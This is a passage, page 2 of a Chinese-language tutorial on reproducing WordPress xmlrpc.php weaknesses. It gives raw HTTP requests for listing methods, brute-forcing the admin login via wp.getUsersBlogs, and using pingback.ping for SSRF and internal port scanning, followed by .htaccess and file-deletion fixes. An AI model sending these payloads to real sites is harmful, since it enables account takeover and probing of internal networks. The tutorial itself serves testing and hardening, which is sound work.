复现WordPressxmlrpc.php漏洞和SSRF的详细步骤


当前第2页 返回上一页

四、深入利用

(一)查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

 (二)账号爆破

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
......
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>

(三)通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99
.......
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>要探测的URL</string>
</value></param></params>
</methodCall>

五、漏洞修复

(一)通过APACHE的.htaccess屏蔽xmlrpc.php文件的访问。配置代码如下:

# protect xmlrpc
<Files "xmlrpc.php">
Order Allow,Deny
Deny from all
</Files>

(二)删除根目录下的xmlrpc.php。

到此这篇关于复现WordPress xmlrpc.php漏洞和SSRF的文章就介绍到这了,更多相关WordPress漏洞复现内容请搜索


标签:WordPress

返回前面的内容

相关阅读 >>

wordpress去除img标签的高度与宽度让图片自适应屏幕

dreamweaver cs5 中启用 wordpress 代码提示功能的图文方法

wordpress中给文章添加自定义字段及后台编辑功能区域

wordpress获取指定分类文章数量的方法

wordpress主题green-park-2导航栏修改技巧

wordpress链接google字体慢的完美解决教程

wordpress后台添加子菜单的常用几种情况及对应方法

wordpress修改某篇文章id(把id为148的改成147)的sql语句

wordpress首页文章限制显示字数的方法

加速wordpress技巧redis缓存输出的html页面

更多相关阅读请进入《wordpress》频道 >>



打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,您说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

分享从这里开始,精彩与您同在

评论

管理员已关闭评论功能...